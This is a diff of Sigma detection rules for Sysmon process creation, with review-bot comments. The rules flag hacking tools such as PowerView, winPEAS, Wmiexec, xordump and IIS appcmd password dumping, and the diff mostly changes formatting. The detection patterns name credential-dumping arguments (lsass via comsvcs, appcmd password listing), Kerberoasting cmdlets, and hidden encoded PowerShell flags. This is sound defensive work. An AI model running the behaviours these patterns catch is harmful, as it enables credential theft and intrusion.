'Get-NetDomainTrust' + - Get-NetFileServer + - Get-NetForest # 'Get-NetForestCatalog', 'Get-NetForestDomain', 'Get-NetForestTrust' + - Get-NetGPO # 'Get-NetGPOGroup' + # - 'Get-NetGroup' + - Get-NetGroupMember + - Get-NetLocalGroup # 'Get-NetLocalGroupMember' + - Get-NetLoggedon + - Get-NetOU + - Get-NetProcess + - Get-NetRDPSession + - Get-NetSession + - Get-NetShare + - Get-NetSite + - Get-NetSubnet + - Get-NetUser + # - 'Get-ObjectAcl' + - Get-PathAcl + - Get-PrincipalContext + # - 'Get-Proxy' + - Get-RegistryMountedDrive + - Get-RegLoggedOn + # - 'Get-SiteName' + # - 'Get-UserEvent' + # - 'Get-WMIProcess' + - Get-WMIRegCachedRDPConnection + - Get-WMIRegLastLoggedOn + - Get-WMIRegMountedDrive + - Get-WMIRegProxy + - Invoke-ACLScanner + - Invoke-CheckLocalAdminAccess + - Invoke-Kerberoast + - Invoke-MapDomainTrust + - Invoke-RevertToSelf + - Invoke-Sharefinder + - Invoke-UserImpersonation + # - 'New-DomainGroup' + # - 'New-DomainUser' + - Remove-DomainObjectAcl + - Remove-RemoteConnection + - Request-SPNTicket + # - 'Resolve-IPAddress' + # - 'Set-ADObject' + - Set-DomainObject + # - 'Set-DomainUserPassword' + - Test-AdminAccess condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_silenttrinity_stager.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_silenttrinity_stager.yml index fc65974e1..053ab567f 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_silenttrinity_stager.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_silenttrinity_stager.yml @@ -1,8 +1,8 @@ title: HackTool - SILENTTRINITY Stager Execution id: 03552375-cc2c-4883-bbe4-7958d5a980be related: - - id: 75c505b1-711d-4f68-a357-8c3fe37dbf2d - type: derived + - id: 75c505b1-711d-4f68-a357-8c3fe37dbf2d # DLL Load + type: derived status: test description: Detects SILENTTRINITY stager use via PE metadata references: 
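Review bot: The cmdlet names newly commented out inside `CommandLine|contains` (for example `# - 'Get-DomainUser'`, `# - 'Get-NetGroup'`, `# - 'Set-DomainUserPassword'`) carry no explanation, so a later maintainer cannot tell whether they were excluded for false-positive reasons, because another rule covers them, or by oversight. A single comment above the list, e.g. `# Commented-out entries are intentionally excluded (reason: <fill in>); do not re-enable without review`, would preserve that intent. The inline notes such as `# 'Get-DomainObjectAcl'` beside `Get-DomainObject` are a good model, since they record which longer names the substring match already covers. The active keyword list itself appears unchanged from the old side of the hunk.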
diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_sliver_c2_execution_pattern.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_sliver_c2_execution_pattern.yml index 218d4aebd..ed1daf31a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_sliver_c2_execution_pattern.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_sliver_c2_execution_pattern.yml @@ -1,8 +1,7 @@ title: HackTool - Sliver C2 Implant Activity Pattern id: 42333b2c-b425-441c-b70e-99404a17170f status: test -description: Detects process activity patterns as seen being used by Sliver C2 framework - implants +description: Detects process activity patterns as seen being used by Sliver C2 framework implants references: - https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/implant/sliver/shell/shell_windows.go#L36 - https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/ @@ -21,7 +20,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: -NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8 + CommandLine|contains: -NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8 condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_stracciatella_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_stracciatella_execution.yml index 381767cbd..e722ffda9 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_stracciatella_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_stracciatella_execution.yml 
@@ -1,9 +1,7 @@ title: HackTool - Stracciatella Execution id: 7a4d9232-92fc-404d-8ce1-4c92e7caf539 status: experimental -description: Detects Stracciatella which executes a Powershell runspace from within - C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled - based on PE metadata characteristics. +description: Detects Stracciatella which executes a Powershell runspace from within C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled based on PE metadata characteristics. references: - https://github.com/mgeeky/Stracciatella author: pH-T (Nextron Systems) @@ -22,17 +20,18 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \Stracciatella.exe - - OriginalFileName: Stracciatella.exe - - Description: Stracciatella - - Hashes|contains: - - SHA256=9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956 - - SHA256=fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a - - sha256: - - 9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956 - - fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a + - Image|endswith: \Stracciatella.exe + - OriginalFileName: Stracciatella.exe + - Description: Stracciatella + - Hashes|contains: + - SHA256=9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956 + - SHA256=fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a + - sha256: + - 9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956 + - fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a condition: process_creation and selection falsepositives: - Unlikely level: high + ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_sysmoneop.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_sysmoneop.yml index f1718649d..3c875f908 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_sysmoneop.yml 
+++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_sysmoneop.yml @@ -22,12 +22,12 @@ detection: selection_img: Image|endswith: \SysmonEOP.exe selection_hash: - - Hashes: - - IMPHASH=22F4089EB8ABA31E1BB162C6D9BF72E5 - - IMPHASH=5123FA4C4384D431CD0D893EEB49BBEC - - Imphash: - - 22f4089eb8aba31e1bb162c6d9bf72e5 - - 5123fa4c4384d431cd0d893eeb49bbec + - Hashes: + - IMPHASH=22F4089EB8ABA31E1BB162C6D9BF72E5 + - IMPHASH=5123FA4C4384D431CD0D893EEB49BBEC + - Imphash: + - 22f4089eb8aba31e1bb162c6d9bf72e5 + - 5123fa4c4384d431cd0d893eeb49bbec condition: process_creation and (1 of selection_*) falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_trufflesnout.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_trufflesnout.yml index 9e583bede..5a99f3ba8 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_trufflesnout.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_trufflesnout.yml @@ -1,8 +1,7 @@ title: HackTool - TruffleSnout Execution id: 69ca006d-b9a9-47f5-80ff-ecd4d25d481a status: test -description: Detects the use of TruffleSnout.exe an iterative AD discovery toolkit - for offensive operators, situational awareness and targeted low noise enumeration. +description: Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration. references: - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1482/T1482.md - https://github.com/dsnezhkov/TruffleSnout @@ -22,8 +21,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - OriginalFileName: TruffleSnout.exe - - Image|endswith: \TruffleSnout.exe + - OriginalFileName: TruffleSnout.exe + - Image|endswith: \TruffleSnout.exe condition: process_creation and selection falsepositives: - Unknown 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_uacme.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_uacme.yml index bb6fbd055..84e0a9414 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_uacme.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_uacme.yml @@ -1,8 +1,7 @@ title: HackTool - UACMe Akagi Execution id: d38d2fa4-98e6-4a24-aff1-410b0c9ad177 status: test -description: Detects the execution of UACMe, a tool used for UAC bypasses, via default - PE metadata +description: Detects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata references: - https://github.com/hfiref0x/UACME author: Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems) @@ -21,19 +20,19 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_pe: - - Product: UACMe - - Company: - - REvol Corp - - APT 92 - - UG North - - Hazardous Environments - - CD Project Rekt - - Description: - - UACMe main module - - Pentesting utility - - OriginalFileName: - - Akagi.exe - - Akagi64.exe + - Product: UACMe + - Company: + - REvol Corp + - APT 92 + - UG North + - Hazardous Environments + - CD Project Rekt + - Description: + - UACMe main module + - Pentesting utility + - OriginalFileName: + - Akagi.exe + - Akagi64.exe selection_img: Image|endswith: - \Akagi64.exe diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_wce.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_wce.yml index 9cf413e28..dacc68864 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_wce.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_wce.yml 
@@ -20,14 +20,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_1: - - Imphash: - - a53a02b997935fd8eedcb5f7abab9b9f - - e96a73c7bf33a464c510ede582318bf2 - - Hashes|contains: - - IMPHASH=a53a02b997935fd8eedcb5f7abab9b9f - - IMPHASH=e96a73c7bf33a464c510ede582318bf2 + - Imphash: + - a53a02b997935fd8eedcb5f7abab9b9f + - e96a73c7bf33a464c510ede582318bf2 + - Hashes|contains: # Sysmon field hashes contains all types + - IMPHASH=a53a02b997935fd8eedcb5f7abab9b9f + - IMPHASH=e96a73c7bf33a464c510ede582318bf2 selection_2: - CommandLine|endswith: .exe -S + CommandLine|endswith: .exe -S ParentImage|endswith: \services.exe filter: Image|endswith: \clussvc.exe diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_winpeas.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_winpeas.yml index 5880ed172..e31913064 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_winpeas.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_winpeas.yml @@ -1,8 +1,7 @@ title: HackTool - winPEAS Execution id: 98b53e78-ebaf-46f8-be06-421aafd176d9 status: experimental -description: WinPEAS is a script that search for possible paths to escalate privileges - on Windows hosts. The checks are explained on book.hacktricks.xyz +description: WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz references: - https://github.com/carlospolop/PEASS-ng - https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation 
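Review bot: The `# Sysmon field hashes contains all types` comment added on `Hashes|contains` in selection_1 documents exactly the trap that the SysmonEOP hunk earlier in this patch (proc_creation_win_hktl_sysmoneop.yml) does not avoid: its selection_hash uses a plain `Hashes:` exact match against `IMPHASH=...`, which cannot match a Sysmon Hashes value that bundles several algorithms (e.g. a `SHA256=...,IMPHASH=...` string) unless the sensor is configured to emit IMPHASH alone. If that rule is meant to work on ordinary Sysmon configurations, its new side should read `- Hashes|contains:` as here and as the Stracciatella hunk already does for SHA256. This is a one-token change on that file and is not introduced by the present commit, which only re-indents those lines.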
@@ -23,29 +22,29 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - OriginalFileName: winPEAS.exe - - Image|endswith: - - \winPEASany_ofs.exe - - \winPEASany.exe - - \winPEASx64_ofs.exe - - \winPEASx64.exe - - \winPEASx86_ofs.exe - - \winPEASx86.exe + - OriginalFileName: winPEAS.exe + - Image|endswith: + - \winPEASany_ofs.exe + - \winPEASany.exe + - \winPEASx64_ofs.exe + - \winPEASx64.exe + - \winPEASx86_ofs.exe + - \winPEASx86.exe selection_cli_option: - CommandLine|contains: - - ' applicationsinfo' - - ' browserinfo' - - ' eventsinfo' - - ' fileanalysis' - - ' filesinfo' - - ' processinfo' - - ' servicesinfo' - - ' windowscreds' + CommandLine|contains: + - ' applicationsinfo' # Search installed applications information + - ' browserinfo' # Search browser information + - ' eventsinfo' # Display interesting events information + - ' fileanalysis' # Search specific files that can contains credentials and for regexes inside files + - ' filesinfo' # Search generic files that can contains credentials + - ' processinfo' # Search processes information + - ' servicesinfo' # Search services information + - ' windowscreds' # Search windows credentials selection_cli_dl: - CommandLine|contains: https://github.com/carlospolop/PEASS-ng/releases/latest/download/ + CommandLine|contains: https://github.com/carlospolop/PEASS-ng/releases/latest/download/ selection_cli_specific: - - ParentCommandLine|endswith: ' -linpeas' - - CommandLine|endswith: ' -linpeas' + - ParentCommandLine|endswith: ' -linpeas' + - CommandLine|endswith: ' -linpeas' condition: process_creation and (1 of selection_*) falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_winpwn.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_winpwn.yml index a314f2cf1..b15b4b619 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_winpwn.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_winpwn.yml 
@@ -1,13 +1,11 @@ title: HackTool - WinPwn Execution id: d557dc06-62e8-4468-a8e8-7984124908ce related: - - id: 851fd622-b675-4d26-b803-14bc7baa517a - type: similar + - id: 851fd622-b675-4d26-b803-14bc7baa517a + type: similar status: experimental -description: 'Detects commandline keywords indicative of potential usge of the tool - WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation. - - ' +description: | + Detects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation. author: Swachchhanda Shrawan Poudel date: 2023/12/04 references: @@ -39,7 +37,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - Offline_Winpwn - 'WinPwn ' - WinPwn.exe diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_wmiexec_default_powershell.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_wmiexec_default_powershell.yml index 1d6809db6..ebf5f39f1 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_wmiexec_default_powershell.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_wmiexec_default_powershell.yml @@ -1,8 +1,7 @@ title: HackTool - Wmiexec Default Powershell Command id: 022eaba8-f0bf-4dd9-9217-4604b0bb3bb0 status: experimental -description: Detects the execution of PowerShell with a specific flag sequence that - is used by the Wmiexec script +description: Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script references: - https://github.com/fortra/impacket/blob/f4b848fa27654ca95bc0f4c73dbba8b9c2c9f30a/examples/wmiexec.py author: Nasreddine Bencherchali (Nextron Systems) 
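Review bot: The description, now a `|` block scalar, still carries the typo `usge`; the new line should read `Detects commandline keywords indicative of potential usage of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.` The switch from the quoted string with its embedded blank line to a block scalar is otherwise an improvement and needs no further change.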
@@ -19,7 +18,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: -NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc + CommandLine|contains: -NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_xordump.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_xordump.yml index 7d3efea67..63a9aa75c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_xordump.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_xordump.yml @@ -20,12 +20,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \xordump.exe - - CommandLine|contains: - - ' -process lsass.exe ' - - ' -m comsvcs ' - - ' -m dbghelp ' - - ' -m dbgcore ' + - Image|endswith: \xordump.exe + - CommandLine|contains: + - ' -process lsass.exe ' + - ' -m comsvcs ' + - ' -m dbghelp ' + - ' -m dbgcore ' condition: process_creation and selection falsepositives: - Another tool that uses the command line switches of XORdump diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_zipexec.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_zipexec.yml index 226ca8503..fb87c2b82 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_zipexec.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_zipexec.yml @@ -1,8 +1,7 @@ title: Suspicious ZipExec Execution id: 90dcf730-1b71-4ae7-9ffc-6fcf62bd0132 status: test -description: ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into - a password-protected zip file. +description: ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file. references: - https://twitter.com/SBousseaden/status/1451237393017839616 - https://github.com/Tylous/ZipExec 
@@ -23,13 +22,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational run: - CommandLine|contains|all: + CommandLine|contains|all: - /generic:Microsoft_Windows_Shell_ZipFolder:filename= - .zip - '/pass:' - '/user:' delete: - CommandLine|contains|all: + CommandLine|contains|all: - /delete - Microsoft_Windows_Shell_ZipFolder:filename= - .zip diff --git a/sigma/sysmon/process_creation/proc_creation_win_hwp_exploits.yml b/sigma/sysmon/process_creation/proc_creation_win_hwp_exploits.yml index 41a72c2de..150673c16 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hwp_exploits.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hwp_exploits.yml @@ -1,8 +1,7 @@ title: Suspicious HWP Sub Processes id: 023394c4-29d5-46ab-92b8-6a534c6f447b status: test -description: Detects suspicious Hangul Word Processor (Hanword) sub processes that - could indicate an exploitation +description: Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation references: - https://www.securitynewspaper.com/2016/11/23/technical-teardown-exploit-malware-hwp-files/ - https://www.hybrid-analysis.com/search?query=context:74940dcc5b38f9f9b1a0fea760d344735d7d91b610e6d5bd34533dd0153402c5&from_sample=5db135000388385a7644131f&block_redirect=1 diff --git a/sigma/sysmon/process_creation/proc_creation_win_hxtsr_masquerading.yml b/sigma/sysmon/process_creation/proc_creation_win_hxtsr_masquerading.yml index ca6324bde..3f53c5402 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hxtsr_masquerading.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hxtsr_masquerading.yml 
@@ -1,18 +1,11 @@ title: Fake Instance Of Hxtsr.exe id: 4e762605-34a8-406d-b72e-c1a089313320 status: test -description: 'HxTsr.exe is a Microsoft compressed executable file called Microsoft - Outlook Communications. - - HxTsr.exe is part of Outlook apps, because it resides in a hidden "WindowsApps" - subfolder of "C:\Program Files". - +description: | + HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications. + HxTsr.exe is part of Outlook apps, because it resides in a hidden "WindowsApps" subfolder of "C:\Program Files". Its path includes a version number, e.g., "C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7466.41167.0_x64__8wekyb3d8bbwe\HxTsr.exe". - - Any instances of hxtsr.exe not in this folder may be malware camouflaging itself - as HxTsr.exe - - ' + Any instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe author: Sreeman date: 2020/04/17 modified: 2023/02/21 diff --git a/sigma/sysmon/process_creation/proc_creation_win_icacls_deny.yml b/sigma/sysmon/process_creation/proc_creation_win_icacls_deny.yml index 7c0297a2a..44da29e2e 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_icacls_deny.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_icacls_deny.yml @@ -1,8 +1,7 @@ title: Use Icacls to Hide File to Everyone id: 4ae81040-fc1c-4249-bfa3-938d260214d9 status: test -description: Detect use of icacls to deny access for everyone in Users folder sometimes - used to hide malicious files +description: Detect use of icacls to deny access for everyone in Users folder sometimes used to hide malicious files references: - https://app.any.run/tasks/1df999e6-1cb8-45e3-8b61-499d1b7d5a9b/ author: frack113 
@@ -19,10 +18,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_icacls: - - OriginalFileName: iCACLS.EXE - - Image|endswith: \icacls.exe - selection_cmd: - CommandLine|contains|all: + - OriginalFileName: iCACLS.EXE + - Image|endswith: \icacls.exe + selection_cmd: # icacls "C:\Users\admin\AppData\Local\37f92fe8-bcf0-4ee0-b8ba-561f797f5696" /deny *S-1-1-0:(OI)(CI)(DE,DC) + CommandLine|contains|all: - C:\Users\ - /deny - '*S-1-1-0:' diff --git a/sigma/sysmon/process_creation/proc_creation_win_ieexec_download.yml b/sigma/sysmon/process_creation/proc_creation_win_ieexec_download.yml index a4d9abf0d..7b9393af6 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_ieexec_download.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_ieexec_download.yml @@ -19,10 +19,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \IEExec.exe - - OriginalFileName: IEExec.exe + - Image|endswith: \IEExec.exe + - OriginalFileName: IEExec.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - http:// - https:// condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_iis_appcmd_http_logging.yml b/sigma/sysmon/process_creation/proc_creation_win_iis_appcmd_http_logging.yml index 904612f8a..6508642de 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_iis_appcmd_http_logging.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_iis_appcmd_http_logging.yml 
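Review bot: The comment added on `selection_cmd:` shows an example invocation, but the `'*S-1-1-0:'` term beneath it is left unexplained, so a reader has to recognise the SID to see why this matches the "deny to everyone" behaviour named in the title; annotate it as `- '*S-1-1-0:' # well-known SID for Everyone; icacls takes SIDs with a leading "*"`. The example command line in the comment could be trimmed to the part the `contains|all` terms actually match (`/deny *S-1-1-0:(OI)(CI)(DE,DC)`), which keeps the line short without losing the point.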
@@ -1,8 +1,7 @@ title: Disable Windows IIS HTTP Logging id: e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e status: test -description: Disables HTTP logging on a Windows IIS web server as seen by Threat Group - 3390 (Bronze Union) +description: Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union) references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.002/T1562.002.md#atomic-test-1---disable-windows-iis-http-logging author: frack113 @@ -20,10 +19,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \appcmd.exe - - OriginalFileName: appcmd.exe + - Image|endswith: \appcmd.exe + - OriginalFileName: appcmd.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - set - config - section:httplogging diff --git a/sigma/sysmon/process_creation/proc_creation_win_iis_appcmd_service_account_password_dumped.yml b/sigma/sysmon/process_creation/proc_creation_win_iis_appcmd_service_account_password_dumped.yml index 822da1dcb..0c1b03b24 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_iis_appcmd_service_account_password_dumped.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_iis_appcmd_service_account_password_dumped.yml @@ -1,8 +1,7 @@ title: Microsoft IIS Service Account Password Dumped id: 2d3cdeec-c0db-45b4-aa86-082f7eb75701 status: test -description: Detects the Internet Information Services (IIS) command-line tool, AppCmd, - being used to list passwords +description: Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords references: - https://www.elastic.co/guide/en/security/current/microsoft-iis-service-account-password-dumped.html - https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA 
@@ -22,30 +21,31 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_base_name: - - Image|endswith: \appcmd.exe - - OriginalFileName: appcmd.exe + - Image|endswith: \appcmd.exe + - OriginalFileName: appcmd.exe selection_base_list: - CommandLine|contains: 'list ' + CommandLine|contains: 'list ' selection_standalone: - CommandLine|contains: - - ' /config' + CommandLine|contains: + - ' /config' # https://pbs.twimg.com/media/FgydDAJWIAEio34?format=png&name=900x900 - ' /xml' + # We cover the "-" version just in case :) - ' -config' - ' -xml' selection_cmd_flags: - CommandLine|contains: - - ' /@t' + CommandLine|contains: + - ' /@t' # Covers both "/@text:*" and "/@t:*" - ' /text' - ' /show' + # We cover the "-" version just in case :) - ' -@t' - ' -text' - ' -show' selection_cmd_grep: - CommandLine|contains: + CommandLine|contains: - :\* - password - condition: process_creation and (all of selection_base_* and (selection_standalone - or all of selection_cmd_*)) + condition: process_creation and (all of selection_base_* and (selection_standalone or all of selection_cmd_*)) falsepositives: - Unknown level: high diff --git a/sigma/sysmon/process_creation/proc_creation_win_iis_appcmd_susp_module_install.yml b/sigma/sysmon/process_creation/proc_creation_win_iis_appcmd_susp_module_install.yml index 2ca8c61ef..267d7bd21 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_iis_appcmd_susp_module_install.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_iis_appcmd_susp_module_install.yml 
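Review bot: The comment added beside `' /config'` is only a pbs.twimg.com image link, which stops being documentation once the image is gone; state in words what it illustrates or point at the 0gtweet reference already listed in the rule, e.g. `- ' /config' # observed dump pattern, see the 0gtweet reference above`. The `# Covers both "/@text:*" and "/@t:*"` comment on `' /@t'` is the better model and explains a substring match that is otherwise easy to misread. Unwrapping `condition:` onto a single line also makes the `selection_standalone or all of selection_cmd_*` grouping easier to read.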
@@ -20,20 +20,19 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \appcmd.exe - - OriginalFileName: appcmd.exe + - Image|endswith: \appcmd.exe + - OriginalFileName: appcmd.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - install - module - CommandLine|contains: + CommandLine|contains: - '/name:' - '-name:' filter_iis_setup: ParentImage: C:\Windows\System32\inetsrv\iissetup.exe condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: - - Unknown as it may vary from organisation to organisation how admins use to install - IIS modules + - Unknown as it may vary from organisation to organisation how admins use to install IIS modules level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_iis_appcmd_susp_rewrite_rule.yml b/sigma/sysmon/process_creation/proc_creation_win_iis_appcmd_susp_rewrite_rule.yml index 57d41269e..c418bc9f3 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_iis_appcmd_susp_rewrite_rule.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_iis_appcmd_susp_rewrite_rule.yml @@ -1,9 +1,7 @@ title: Suspicious IIS URL GlobalRules Rewrite Via AppCmd id: 7c8af9b2-dcae-41a2-a9db-b28c288b5f08 status: test -description: Detects usage of "appcmd" to create new global URL rewrite rules. This - behaviour has been observed being used by threat actors to add new rules so they - can access their webshells. +description: Detects usage of "appcmd" to create new global URL rewrite rules. This behaviour has been observed being used by threat actors to add new rules so they can access their webshells. references: - https://twitter.com/malmoeb/status/1616702107242971144 - https://learn.microsoft.com/en-us/answers/questions/739120/how-to-add-re-write-global-rule-with-action-type-r 
@@ -20,10 +18,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \appcmd.exe - - OriginalFileName: appcmd.exe + - Image|endswith: \appcmd.exe + - OriginalFileName: appcmd.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - set - config - section:system.webServer/rewrite/globalRules diff --git a/sigma/sysmon/process_creation/proc_creation_win_iis_connection_strings_decryption.yml b/sigma/sysmon/process_creation/proc_creation_win_iis_connection_strings_decryption.yml index 10f482744..606f6ded1 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_iis_connection_strings_decryption.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_iis_connection_strings_decryption.yml @@ -1,10 +1,7 @@ title: Microsoft IIS Connection Strings Decryption id: 97dbf6e2-e436-44d8-abee-4261b24d3e41 status: test -description: Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. - An attacker with Microsoft IIS web server access via a webshell or alike can decrypt - and dump any hardcoded connection strings, such as the MSSQL service account password - using aspnet_regiis command. +description: Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command. references: - https://www.elastic.co/guide/en/security/current/microsoft-iis-connection-strings-decryption.html author: Tim Rauch 
